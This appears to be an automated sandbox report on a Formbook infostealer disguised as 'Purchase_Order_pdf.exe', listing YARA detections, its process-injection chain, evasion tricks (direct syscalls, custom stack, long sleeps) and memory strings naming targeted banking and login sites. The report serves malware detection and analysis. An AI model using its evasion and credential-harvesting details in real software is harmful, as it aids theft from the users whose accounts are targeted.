        Source: Yara matchFile source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: Purchase_Order_pdf.exe
        Source: initial sampleStatic PE information: Filename: Purchase_Order_pdf.exe
        Source: Purchase_Order_pdf.exe, 00000000.00000003.2047798166.000000000488D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase_Order_pdf.exe
        Source: Purchase_Order_pdf.exe, 00000000.00000003.2048908669.00000000046E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase_Order_pdf.exe
        Source: Purchase_Order_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@23/12
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\syphilousJump to behavior
        Source: Purchase_Order_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: rasdial.exe, 00000005.00000003.2608027017.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2607979855.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2609646066.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4484702585.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2609646066.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4484702585.0000000000B88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Purchase_Order_pdf.exeReversingLabs: Detection: 41%
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeFile read: C:\Users\user\Desktop\Purchase_Order_pdf.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Purchase_Order_pdf.exe "C:\Users\user\Desktop\Purchase_Order_pdf.exe"
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase_Order_pdf.exe"
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
        Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase_Order_pdf.exe"Jump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Purchase_Order_pdf.exeStatic file information: File size 1327231 > 1048576
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hEtOKWgxZfeL.exe, 00000004.00000002.4484569448.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4484878886.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Purchase_Order_pdf.exe, 00000000.00000003.2047254065.0000000004760000.00000004.00001000.00020000.00000000.sdmp, Purchase_Order_pdf.exe, 00000000.00000003.2048049881.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335290079.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333557983.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2429250669.0000000003800000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004BBE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2431777913.000000000486C000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2429249602.00000000046B2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4485958019.0000000004A20000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2429147053.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398042132.000000000321A000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485192473.0000000001388000.00000004.00000020.00020000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000003.2368169861.000000000139B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4486451389.000000000504C000.00000004.10000000.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000002ABC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2719786041.00000000121FC000.00000004.80000000.00040000.00000000.sdmp
        Source: Purchase_Order_pdf.exeStatic PE information: real checksum: 0xa2135 should be: 0x14e6ee
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\Purchase_Order_pdf.exeAPI/Special instruction interceptor: Address: 3F35A84
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
        Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
        Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9721Jump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060Thread sleep count: 252 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060Thread sleep time: -504000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060Thread sleep count: 9721 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exe TID: 7060Thread sleep time: -19442000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576Thread sleep time: -80000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576Thread sleep time: -43500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576Thread sleep count: 35 > 30Jump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe TID: 576Thread sleep time: -35000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
        Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
        Source: 1FZhY82B.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: firefox.exe, 00000008.00000002.2721144966.00000276920AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS!
        Source: 1FZhY82B.5.drBinary or memory string: discord.comVMware20,11696428655f
        Source: 1FZhY82B.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: global block list test formVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: 1FZhY82B.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,116
        Source: 1FZhY82B.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: 1FZhY82B.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: 1FZhY82B.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
        Source: 1FZhY82B.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: rasdial.exe, 00000005.00000002.4484702585.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: last_fourVARCHARVMware
        Source: 1FZhY82B.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
        Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655L
        Source: 1FZhY82B.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: 1FZhY82B.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: AMC password management pageVMware20,11696428655
        Source: rasdial.exe, 00000005.00000002.4487831204.0000000007A27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116964286
        Source: 1FZhY82B.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
        Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: 1FZhY82B.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: 1FZhY82B.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
        Source: 1FZhY82B.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: hEtOKWgxZfeL.exe, 00000007.00000002.4485448205.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
        Source: 1FZhY82B.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
        Source: 1FZhY82B.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: 1FZhY82B.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
        Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
